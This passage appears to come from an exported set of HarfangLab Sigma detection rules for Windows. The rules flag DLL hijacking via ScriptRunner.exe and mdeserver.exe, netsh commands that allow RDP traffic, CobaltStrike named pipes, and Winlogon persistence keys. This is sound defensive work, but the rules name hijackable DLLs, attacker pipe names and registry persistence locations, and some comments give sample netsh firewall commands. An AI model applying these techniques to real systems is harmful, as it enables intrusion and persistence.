Firefox\\'\n - '?:\\Program Files\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files\\Mozilla Firefox\\'\n - '?:\\Users\\\\*\\AppData\\Roaming\\Zoom\\bin\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2097d94f-4a7d-417e-8cb0-063a71e4cd4c", "rule_name": "DLL Hijacking via ScriptRunner.exe", "rule_description": "Detects potential Windows DLL Hijacking via ScriptRunner.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2022-09-15", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "20bddb6e-34a9-4ce0-821d-1a33c767e9a7", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.078839Z", "creation_date": "2026-03-23T11:45:34.078841Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.078846Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.helpwire.app/blog/enable-remote-desktop-command-line/", "https://thedfirreport.com/2024/01/29/buzzing-on-christmas-eve-trigona-ransomware-in-3-hours/", "https://thedfirreport.com/2021/05/12/conti-ransomware/", "https://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/netsh-advfirewall-firewall-control-firewall-behavior#command-example-8-enable-specific-services", "https://attack.mitre.org/techniques/T1562/004/", "https://attack.mitre.org/techniques/T1021/001/" ], "name": "t1562_004_firewall_allow_rdp.yml", "content": "title: Remote Desktop Traffic Enabled via netsh\nid: 20bddb6e-34a9-4ce0-821d-1a33c767e9a7\ndescription: |\n Detects a firewall filter modification that allows RDP traffic to pass through.\n Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials.\n It is recommended to analyze the process responsible for the execution of netsh.exe, to look for other suspicious activities on the host and to investigate subsequent malicious RDP connections to the host.\nreferences:\n - https://www.helpwire.app/blog/enable-remote-desktop-command-line/\n - https://thedfirreport.com/2024/01/29/buzzing-on-christmas-eve-trigona-ransomware-in-3-hours/\n - https://thedfirreport.com/2021/05/12/conti-ransomware/\n - https://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/netsh-advfirewall-firewall-control-firewall-behavior#command-example-8-enable-specific-services\n - https://attack.mitre.org/techniques/T1562/004/\n - https://attack.mitre.org/techniques/T1021/001/\ndate: 2022/12/01\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.004\n - attack.lateral_movement\n - attack.t1021.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_netsh1:\n Image|endswith: '\\netsh.exe'\n # netsh firewall set service RemoteDesktop enable\n # netsh advfirewall firewall set rule group=\"remote desktop\" new enable=Yes\n CommandLine|contains|all:\n - 'firewall'\n - 'set'\n - 'remote'\n - 'desktop'\n - 'enable'\n selection_netsh2:\n Image|endswith: '\\netsh.exe'\n # netsh advfirewall firewall add rule name=\"rdp\" dir=in protocol=tcp localport=3389 action=allow\n CommandLine|contains|all:\n - 'firewall'\n - 'add rule'\n - 'rdp'\n - 'allow'\n - '3389'\n\n # Exclusion for firewall activation\n # netsh advfirewall firewall set rule group=\"remote desktop\" new enable=no\n filter_disable:\n CommandLine|contains|all:\n - 'set rule'\n - 'enable'\n - 'no'\n\n exclusion_open_nebula:\n Ancestors|contains:\n - '|?:\\Program Files\\OpenNebula\\rhsrvany.exe|'\n - '|?:\\Program Files (x86)\\OpenNebula\\rhsrvany.exe|'\n\n # https://learn.microsoft.com/fr-fr/windows-hardware/manufacture/desktop/add-a-custom-script-to-windows-setup?view=windows-11\n exclusion_setupcomplete:\n ParentCommandLine|endswith: '\\cmd.exe /c ?:\\Windows\\Setup\\Scripts\\SetupComplete.cmd'\n\n exclusion_siemens:\n ProcessGrandparentImage: '?:\\Windows\\Temp\\TSplusInstaller\\Setup-Siemens.exe'\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature: 'TSplus SAS'\n\n exclusion_medulla:\n CommandLine|startswith: 'netsh advfirewall firewall add rule name=Remote Desktop for Medulla'\n\n exclusion_syngo:\n ParentCommandLine|contains:\n - '\\syngo_delta_pkg\\setup\\FeatureInstallServer.bat'\n - '\\Program Files\\Siemens\\syngo\\bin\\Common\\'\n\n exclusion_TSplus_AdminTool:\n ProcessGrandparentImage: '?:\\Program Files (x86)\\TSplus\\UserDesktop\\files\\AdminTool.exe'\n\n exclusion_svcr:\n ProcessGrandparentImage|endswith: '\\svcr.exe'\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature|contains: 'Remote Access World SAS'\n\n condition: 1 of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "20bddb6e-34a9-4ce0-821d-1a33c767e9a7", "rule_name": "Remote Desktop Traffic Enabled via netsh", "rule_description": "Detects a firewall filter modification that allows RDP traffic to pass through.\nAdversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials.\nIt is recommended to analyze the process responsible for the execution of netsh.exe, to look for other suspicious activities on the host and to investigate subsequent malicious RDP connections to the host.\n", "rule_creation_date": "2022-12-01", "rule_modified_date": "2025-04-15", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.lateral_movement" ], "rule_technique_tags": [ "attack.t1021.001", "attack.t1562.004" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "20bf9b2e-173e-4162-b9c8-d50e1b4b38ff", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.081735Z", "creation_date": "2026-03-23T11:45:34.081737Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.081741Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_mdeserver.yml", "content": "title: DLL Hijacking via mdeserver.exe\nid: 20bf9b2e-173e-4162-b9c8-d50e1b4b38ff\ndescription: |\n Detects potential Windows DLL Hijacking via mdeserver.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'mdeserver.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\d3d11.dll'\n - '\\dxgi.dll'\n - '\\MFPlat.DLL'\n - '\\RTWorkQ.DLL'\n - '\\SspiCli.dll'\n - '\\winmde.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "20bf9b2e-173e-4162-b9c8-d50e1b4b38ff", "rule_name": "DLL Hijacking via mdeserver.exe", "rule_description": "Detects potential Windows DLL Hijacking via mdeserver.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "20cfd136-f946-4130-a522-6597ff877ac3", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.072975Z", "creation_date": "2026-03-23T11:45:34.072977Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.072981Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.cobaltstrike.com/blog/learn-pipe-fitting-for-all-of-your-offense-projects/", "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575", "https://www.vanimpe.eu/2021/09/12/cobalt-strike-hunting-key-items-to-look-for/", "https://medium.com/falconforce/falconfriday-suspicious-named-pipe-events-0xff1b-fe475d7ebd8", "https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752", "https://github.com/threatexpress/random_c2_profile/blob/main/core/functions.py", "https://attack.mitre.org/techniques/T1021/002/" ], "name": "t1021_002_custom_cobaltstrike_named_pipes_connected.yml", "content": "title: Custom CobaltStrike Named Pipe Connected\nid: 20cfd136-f946-4130-a522-6597ff877ac3\ndescription: |\n Detects the connection to a Named Pipe pertaining to the CobaltStrike framework.\n These are custom CobaltStrike Named Pipe as seen in previous attacks.\n CobaltStrike uses Named Pipes mainly to follow its deployment status and to self-replicate using SMB.\n It is recommended to investigate the process that created the named pipe to determine its legitimacy.\nreferences:\n - https://www.cobaltstrike.com/blog/learn-pipe-fitting-for-all-of-your-offense-projects/\n - https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575\n - https://www.vanimpe.eu/2021/09/12/cobalt-strike-hunting-key-items-to-look-for/\n - https://medium.com/falconforce/falconfriday-suspicious-named-pipe-events-0xff1b-fe475d7ebd8\n - https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752\n - https://github.com/threatexpress/random_c2_profile/blob/main/core/functions.py\n - https://attack.mitre.org/techniques/T1021/002/\ndate: 2022/07/08\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.002\n - attack.execution\n - attack.t1559\n - classification.Windows.Source.NamedPipe\n - classification.Windows.Framework.CobaltStrike\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n category: named_pipe_connection\ndetection:\n selection:\n PipeName:\n - '\\mojo.5688.8052.183894939787088877*'\n - '\\mojo.5688.8052.35780273329370473*'\n - '\\scerpc_*'\n - '\\win_svc*'\n - '\\demoagent_11*'\n - '\\demoagent_22*'\n - '\\Winsock2\\CatalogChangeListener-*-0,'\n - '\\wkssvc_??'\n - '\\ntsvcs??'\n - '\\DserNamePipe??'\n - '\\PGMessagePipe??'\n - '\\SearchTextHarvester??'\n - '\\mypipe-f??'\n - '\\mypipe-h??'\n - '\\windows.update.manager??'\n - '\\windows.update.manager???'\n - '\\MsFteWds??'\n - '\\f4c3??'\n - '\\f53f??'\n - '\\fullduplex_??'\n - '\\msrpc_????'\n - '\\win\\msrpc_??'\n - '\\rpc_??'\n - '\\spoolss_??'\n # https://github.com/threatexpress/random_c2_profile/blob/main/core/functions.py\n - '\\ProtectionManager_????_??'\n - '\\ProtectionManager_??'\n - '\\Winsock2\\\\CatalogChangeListener-???????-1'\n - '\\Winsock2\\\\CatalogChangeListener-??-??'\n - '\\Spool\\\\pipe_????_??'\n - '\\Spool\\\\pipe_??'\n - '\\WkSvcPipeMgr_??????'\n - '\\WkSvcPipeMgr_??'\n - '\\NetClient_??????'\n - '\\NetClient_??'\n - '\\RPC_??????'\n - '\\WiFiNetMgr????_??'\n - '\\WiFiNetMgr_??'\n - '\\AuthPipeD_??'\n\n exclusion_trendmicro:\n PipeName:\n - '\\f4c3??'\n - '\\f53f??'\n ProcessImage:\n - '?:\\Program Files\\Trend Micro\\\\*'\n - '?:\\Program Files (x86)\\Trend Micro\\\\*'\n ProcessSigned: 'true'\n ProcessSignature: 'Trend Micro, Inc.'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\n# level: critical\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "20cfd136-f946-4130-a522-6597ff877ac3", "rule_name": "Custom CobaltStrike Named Pipe Connected", "rule_description": "Detects the connection to a Named Pipe pertaining to the CobaltStrike framework.\nThese are custom CobaltStrike Named Pipe as seen in previous attacks.\nCobaltStrike uses Named Pipes mainly to follow its deployment status and to self-replicate using SMB.\nIt is recommended to investigate the process that created the named pipe to determine its legitimacy.\n", "rule_creation_date": "2022-07-08", "rule_modified_date": "2025-04-15", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.execution", "attack.lateral_movement" ], "rule_technique_tags": [ "attack.t1021.002", "attack.t1559" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "20feacae-9a99-4ce6-8f8c-c02176cb730a", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "moderate", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.620673Z", "creation_date": "2026-03-23T11:45:34.620675Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.620680Z", "rule_level": "high", "rule_confidence": "moderate", "rule_confidence_override": null, "references": [ "https://www.ired.team/offensive-security/persistence/windows-logon-helper", "https://persistence-info.github.io/Data/mpnotify.html", "https://twitter.com/0gtweet/status/1548604288611614725", "https://attack.mitre.org/techniques/T1547/004/" ], "name": "t1547_004_persistence_winlogon_helper.yml", "content": "title: Winlogon Helper DLL Installed\nid: 20feacae-9a99-4ce6-8f8c-c02176cb730a\ndescription: |\n Detects a change of the Winlogon configuration via registry modification.\n Attackers may abuse features of Winlogon to execute DLLs and/or executables at user logon.\n It is recommended to check whether the process modifying the registry keys has legitimate reasons to do it.\nreferences:\n - https://www.ired.team/offensive-security/persistence/windows-logon-helper\n - https://persistence-info.github.io/Data/mpnotify.html\n - https://twitter.com/0gtweet/status/1548604288611614725\n - https://attack.mitre.org/techniques/T1547/004/\ndate: 2020/09/24\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1547.004\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.ConfigChange\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_winlogon:\n EventType: SetValue\n TargetObject|endswith:\n - '\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit'\n - '\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n\n selection_notify:\n EventType: SetValue\n TargetObject|endswith:\n - '\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\\\*\\DllName'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\\\*\\DllName'\n\n # Detects suspicious persistence by creating the mpnotify value.\n # The executable will be loaded by the winlogon.exe process at user logon.\n # The new process will be terminated after a timeout of 30 seconds.\n selection_mpnotify:\n EventType: SetValue\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\mpnotify'\n\n filter_empty:\n Details: '(Empty)'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n ProcessSigned: 'true'\n\n exclusion_userinit:\n TargetObject|endswith:\n - '\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit'\n Details:\n # cannot use *\\userinit.exe because one could add its persistence before the userinit entry and we would miss it\n - '?:\\windows\\system32\\userinit.exe,'\n - '?:\\windows\\system32\\userinit.exe'\n - '?:\\windows\\syswow64\\userinit.exe,'\n - '?:\\windows\\syswow64\\userinit.exe'\n - 'userinit.exe'\n - 'userinit.exe,'\n - '?:\\windows\\system32\\kusrinit.exe,' # DELL/Kace agent\n - '?:\\WINDOWS\\system32\\userinit.exe,?:\\windows\\system32\\KUsrInit.exe,'\n - '?:\\Windows\\system32\\Cliaca2kp.exe,?:\\Windows\\System32\\KUsrInit.exe' # IACA, DELL/Kace agent\n - '?:\\windows\\system32\\userinit.exe,\"?:\\program files\\vmware\\vmware view\\agent\\bin\\wssm.exe\",' # VMWare view agent\n - '?:\\windows\\system32\\userinit.exe,\"?:\\program files\\unidesk\\layering services\\layerinfo.exe\",' # CITRIX app layering\n - '?:\\Windows\\system32\\userinit.exe,?:\\Program Files (x86)\\HP\\HP ProtectTools Security Manager\\Bin\\DPAgent.exe,' # HP ProtectTools agent\n - '?:\\Windows\\system32\\userinit.exe,?:\\Program Files (x86)\\Hewlett-Packard\\HP ProtectTools Security Manager\\Bin\\DPAgent.exe,'\n - '?:\\WINDOWS\\system32\\userinit.exe,\"?:\\Program Files (x86)\\Avencis\\SSOX\\SessionManager+.exe\"' # Avencis\n\n exclusion_shell_explorer:\n TargetObject|endswith:\n - '\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n Details: 'explorer.exe'\n\n exclusion_sccertprop:\n TargetObject: '*\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\ScCertProp\\DllName'\n Details|contains: 'wlnotify.dll'\n\n exclusion_logmein_gotoassist:\n TargetObject:\n - '*\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\GoToAssist Express Customer\\DLLName'\n - '*\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\GoToAssist\\DLLName'\n Details|endswith:\n - 'g2ax_winlogonx64.dll'\n - 'g2awinlogon_x64.dll'\n # FIXME: waiting for agent in production to support those fields\n # ProcessSignature: 'LogMeIn, Inc.'\n # ProcessSigned: 'true'\n\n exclusion_citrix:\n TargetObject: '*\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\MetaFrame\\DLLName'\n Details: 'ctxnotif.dll'\n exclusion_citrix_icaservice:\n TargetObject: '*\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\cpwswlx\\DLLName'\n Details:\n - '?:\\program files\\citrix\\icaservice\\cpwswlx64.dll'\n - '?:\\Program Files\\Citrix\\HDX\\bin\\CpWsWlx64.dll'\n exclusion_citrix_selfservice:\n TargetObject:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n - 'HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\shell'\n Details: '?:\\Program Files (x86)\\Citrix\\ICA Client\\SelfServicePlugin\\selfservice.exe'\n\n exclusion_userlock_agent:\n TargetObject|endswith: '\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit'\n Details: '?:\\WINDOWS\\SYSWOW64\\ULAGENTEXE.EXE,'\n\n exclusion_zonecentral:\n Image: '?:\\Program Files\\Prim?x\\ZoneCentral\\zcs.exe'\n Details: '*zcuserinit.exe*'\n\n exclusion_igfxcui:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\igfxcui\\DLLName'\n Details: 'igfxdev.dll'\n\n exclusion_logishrd:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\LBTWlgn\\DLLName'\n Details|contains: '?:\\program files\\common files\\logishrd\\bluetooth\\LBTWlgn.dll'\n\n exclusion_ccnotify:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\ccnotify\\DLLName'\n Details: 'ccnotify.dll'\n\n exclusion_novell:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\LCredMgr\\DLLName'\n Details: '?:\\Program Files\\Novell\\CASA\\bin\\lcredmgr.dll'\n\n exclusion_zencredmanager:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\ZenCredManager\\DLLName'\n Details: 'ZenCredManager.dll'\n\n # https://tsplus.net/fr/\n exclusion_tsplus:\n ProcessCommandLine:\n - '?:\\wsession\\svcr.exe logonsession.bin ?:\\wsession\\logonsession.exe'\n - '?:\\Program Files (x86)\\TSplus\\UserDesktop\\files\\APSC.exe'\n TargetObject|endswith: '\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n Details: '?:\\ProgramData\\alternateshell.exe'\n\n exclusion_displaynote_technologies:\n ProcessImage: '?:\\Program Files (x86)\\DisplayNoteTechnologies\\Launcher\\KioskStarter.exe'\n Details: '?:\\Program Files (x86)\\DisplayNoteTechnologies\\Launcher\\KioskStarter.exe'\n\n # Windows in kiosk mode\n exclusion_customshellhost:\n ProcessCommandLine|contains: '?:\\windows\\system32\\svchost.exe -k AssignedAccessManagerSvc'\n Details: 'customshellhost.exe'\n\n exclusion_kiosk:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n Details: 'conhost.exe --headless pwsh -WindowStyle hidden -File \"?:\\Windows\\System32\\Kiosk.ps1\"'\n\n exclusion_isl_online:\n ProcessImage:\n - '?:\\Program Files (x86)\\ISL Online Cache\\ISL Restart\\s_?\\ISLLightService.exe'\n - '?:\\Program Files (x86)\\ISL Online\\ISL Restart\\s_?\\ISLLightService.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\ISL Online Cache\\ISL Restart\\s_?\\ISLLightService.exe'\n Details:\n - '?:\\Program Files (x86)\\ISL Online Cache\\ISL Restart\\s_?\\isl_notify64.dll'\n - '?:\\Program Files (x86)\\ISL Online\\ISL Restart\\s_?\\isl_notify64.dll'\n - '?:\\Users\\\\*\\AppData\\Local\\ISL Online Cache\\ISL Restart\\s_?\\isl_notify64.dll'\n\n exclusion_archimed:\n TargetObject: '*\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n Details: '?:\\Program Files\\Archimed\\shell\\unishell.exe'\n\n exclusion_crews:\n TargetObject: '*\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n Details: 'CrewsDesk.exe'\n ProcessImage: '*\\Resa Crews Cupps\\CrewsCupps.exe'\n\n exclusion_omniware:\n ProcessImage|endswith: '\\APSC.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'JWTS SASU'\n - 'Remote Access World SAS'\n Details|startswith: '?:\\ProgramData\\alternateshell.exe'\n\n exclusion_ivanti:\n TargetObject:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit'\n Details|contains:\n - '?:\\Program Files (x86)\\Ivanti\\Workspace Control\\pwrstart.exe'\n - '?:\\Program Files (x86)\\Ivanti\\Workspace Control\\pfwsmgr.exe'\n\n exclusion_windowssetup:\n Image:\n - '?:\\$WINDOWS.~BT\\Sources\\setupplatform.exe'\n - '?:\\$WINDOWS.~BT\\Sources\\setuphost.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_userlock:\n TargetObject:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit'\n Details|contains: '?:\\WINDOWS\\SYSWOW64\\ULAGENTEXE.EXE'\n\n exclusion_kerberos:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\MIT_KFW\\DLLName'\n Details: '?:\\WINDOWS\\system32\\kfwlogon.dll'\n\n exclusion_wkplogin:\n ProcessImage: '?:\\Windows\\System32\\msiexec.exe'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows 